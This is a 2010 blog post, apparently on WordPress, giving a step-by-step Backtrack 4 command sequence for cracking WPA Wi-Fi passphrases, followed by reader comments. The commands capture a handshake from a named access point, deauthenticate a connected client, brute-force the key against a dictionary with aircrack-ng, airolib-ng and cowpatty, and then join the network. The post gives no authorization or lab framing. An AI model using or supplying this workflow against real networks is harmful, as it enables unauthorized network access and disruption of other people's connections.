you're reading...
linux security

Cracking WPA with Backtrack 4

Credits to g0tmi1k. This video goes beyond just cracking wpa, it also shows how the different tools perform. This video explains the methodology really simple. Let me say that cracking WPA is not like cracking WEP, in WEP you’re exploiting a vulnerability in the way the encryption algorithm is implemented, but in WPA the only vulnerability will be in the strength of the user passphrase. Yes you’ve guessed it, when cracking WPA basically what you’re doing is brute-forcing the user password, in other words the success of your attack will depend on your dictionary or password list. If the user’s passphrase is not in your dictionary, you will never crack the WPA key. There are several types of WPA dictionary list out there, but I highly recommend using rainbow-tables which can be several Gigs in size. How to find them?… Google is your friend!


Download Metasploit : Click Here

airmon-ng start wlan0
airodump-ng mon0

airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt

airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack -r crackwpa output-01.cap

cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt

genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash

wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0

Download Metasploit : Click Here
Enjoy 😛 & source : click here


About abdessemed mohamed amine



10 thoughts on “Cracking WPA with Backtrack 4

  1. Please Please Please send me link for download dictionary list THANK THANK THANK FOR THIS

    Posted by Petr | December 2, 2010, 00:20
  2. hi, i want to install “tolls” in backtrack 4 R2 which include dictionaries like your posting above.
    ‘coz I have try it before but failed.
    please help me.. my email : pangandaranartshop[a]yahoo.com

    Posted by joe | January 23, 2011, 07:45
  3. salam kenal

    Posted by reno suryaman | January 30, 2011, 13:33
  4. Dear Friend

    Salam. I tried up to this
    aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt
    but it is giving out folder error or somthing like this. i check in the backtrack there is no folder .. can you please help me in this regard.

    Posted by SYED Malik | February 20, 2011, 10:00
  5. hi, i want to install “tolls” in backtrack 4 R2 which include dictionaries like your posting above.
    ‘coz I have try it before but failed.

    Posted by tahir | March 1, 2011, 00:46
  6. You might try making it more useful for the unintiated by explaining where to get dictionary files and how to use them with airocrack-ng. You don’t really learn anything by watching without an explanation.

    Posted by myg0t | March 26, 2011, 04:01
  7. why u remove the video ???

    Posted by pmetal | April 20, 2012, 08:00
  8. I am genuinely delighted to read this web site posts which includes lots of
    valuable information, thanks for providing these statistics.

    Posted by great site | April 27, 2013, 09:27

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s


September 2010
« Aug   Nov »


Error: Twitter did not respond. Please wait a few minutes and refresh this page.

  • 367,510 Visit !
%d bloggers like this: